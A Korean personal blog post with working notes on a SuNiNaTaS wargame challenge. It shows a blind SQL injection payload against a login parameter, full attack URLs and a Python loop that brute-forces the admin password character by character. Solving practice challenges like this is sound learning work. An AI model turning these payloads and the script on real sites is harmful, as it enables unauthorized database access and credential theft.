블로그 이미지
ludwings

카테고리

분류 전체보기 (132)
WIN API (22)
워게임 (61)
만든것 (2)
메모 (39)
Total17,510
Today1
Yesterday2

admin' and(substring(pw,1,1)='a')--

OK admin


http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1


http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1

>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"

 

 

====

 

 


1. login session 유지

>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth  = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'

 

 

 

 

2. buffer to string
str.decode('utf-8')

 

>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>

admin' and(substring(pw,n,1)=words[i])--


admin' and(substring(pw,1,1)='a')--

N1

N1c3Bilnl


3. 특수문자를 encode 해줘야해..

 

urllib.error.HTTPError: HTTP Error 406: Not Acceptable
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> numbers="123456789"
>>> for i in range(10):
 for j in range(len(words)):
  full_param = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'+numbers[i]+'%2C1%29%3D%27'+words[j]+param2
  resp = opener.open(full_param)
  str = resp.read()
  str2 = str.decode('utf-8')
  if str2.find('OK')>-1:
   print(words[j])
   break

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

최근에 달린 댓글

최근에 받은 트랙백

글 보관함